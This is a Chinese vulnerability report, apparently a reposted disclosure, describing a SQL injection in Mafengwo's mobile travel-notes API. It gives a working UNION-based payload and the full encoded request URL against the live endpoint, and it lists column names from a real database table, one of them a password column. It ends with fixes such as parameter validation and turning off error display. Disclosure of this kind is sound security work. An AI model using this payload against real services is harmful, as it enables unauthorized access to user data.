蚂蜂窝手机应用背后的HTTP API接口存在SQL注入漏洞。
 
同时在这里，非常严肃非常严肃地提醒所有手机应用的开发者，在开发对应的与服务器通讯的API接口时，不要认为加密数据传输就能安全大吉、对参数不加验证就使用！
详细说明：蚂蜂窝有几个手机应用，其中之一为旅行家游记。
 
通过反编译apk，www.2cto.com 发现其与服务器的HTTP API通讯接口：
http://www.mafengwo.cn/mobile/travelnotes/gettravels.php
 
虽然通讯过程采取了加密数据传输，但很容易模拟；其中通讯参数travels_id未经验证即进入SQL查询，导致SQL注入产生。
漏洞证明：

1、POC：
travels_id为“778079 and 1=2 union select 0,char(97,98,97,98,97,97,97,98,98,98,97,99,97),0,0,0,0,0,0,0,0,0,0--”（不含双引号）时的URL：
 
http://www.mafengwo.cn/mobile/travelnotes/gettravels.php?r=%7B%22sign%22%3A%22f7c8542ddf4533a09874d4f829123049%22%2C%22data%22%3A%7B%22travels_id%22%3A%22778079+and+1%3D2+union+select+0%2Cchar%2897%2C98%2C97%2C98%2C97%2C97%2C97%2C98%2C98%2C98%2C97%2C99%2C97%29%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0--%22%2C%22device_id%22%3A%22a984355c5vt74g%22%7D%7D
返回：
 
{"data":{"ret":1,"message":{"id":"ababaaabbbaca","content":"0","img_width":320,"img_list":[]}},"sign":"82b60326ab8a7bd4eb43912d371b34d0"}
 
 
2、证明注入问题存在证据：表travelguide_book含如下列：
id,p_mddid,mddid,name,p_mdd_name,mdd_name,icon,icon_big,ver,type,fee,product_id,file,size,password,publish,download,ob,ctime,lasttime
 
 
 
修复方案：
 
检查所有API接口，是否存在未检查参数等（在普通页面已执行但API层未执行的安全措施）的漏洞。
 
其余建议见“问题描述”。
 
另外给数个漏洞外的建议：
（1）请关闭服务器的错误显示
（2）请尽快升级用户系统，原因和CSDN历史问题相似
 
作者horseluke